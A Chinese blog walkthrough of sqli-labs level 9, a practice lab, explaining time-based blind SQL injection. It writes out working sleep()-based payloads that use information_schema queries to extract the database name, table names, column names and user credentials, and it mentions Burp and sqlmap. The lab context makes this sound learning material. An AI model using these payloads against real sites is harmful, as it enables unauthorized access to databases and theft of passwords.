sqli-labs 9

less -9

很快啊,我们来到了第9题
掌握了第8题的技巧,第九题其实就是在布尔盲注的基础上构造了能自己判断语句正确的能力而使用了sleep()函数
所以也叫延时注入

在这里插入图片描述
我们惊讶的发现原本应该报错的?id=1’都是这样的回显
尝试了很多只会回显
显然这题使得布尔型盲注都无法使用
所以我们使用延时注入来判断语句的对错
?id=1’ and sleep(5) --+
我们注入这样的语句,发现页面标签转了好久的圈圈差不多是五秒
由于我们的1’成功闭合前面–+又注释了后面
而and连接了前面正确的语句所以执行了后面的sleep()函数
所以导致了页面大概等待了5秒的时间
而如果前面的语句闭合错误,那么后面的sleep()函数就将不会被执行
所以如果你的页面响应等待了很久那么恭喜你
你成功闭合了前面
接下来的注入参考sqli-lab 8
爆库名
?id=1’ and (ascii(substr(database(),1,1))=115) and sleep(5) --+
(老规矩,嫌麻烦可以用burp或者sqlmap)
爆表名
?id=1’ and (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database() limit 0,1),1,1))=101) and sleep(5) --+
爆字段名
?id=1’ and (ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘users’ limit 0,1),1,1))>97) and sleep(5) --+
爆内容
?id=1’ and (ascii(substr((select group_concat(username,’ ',password) from users limit 0,1),1,1))=68)
and sleep(5) --+

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值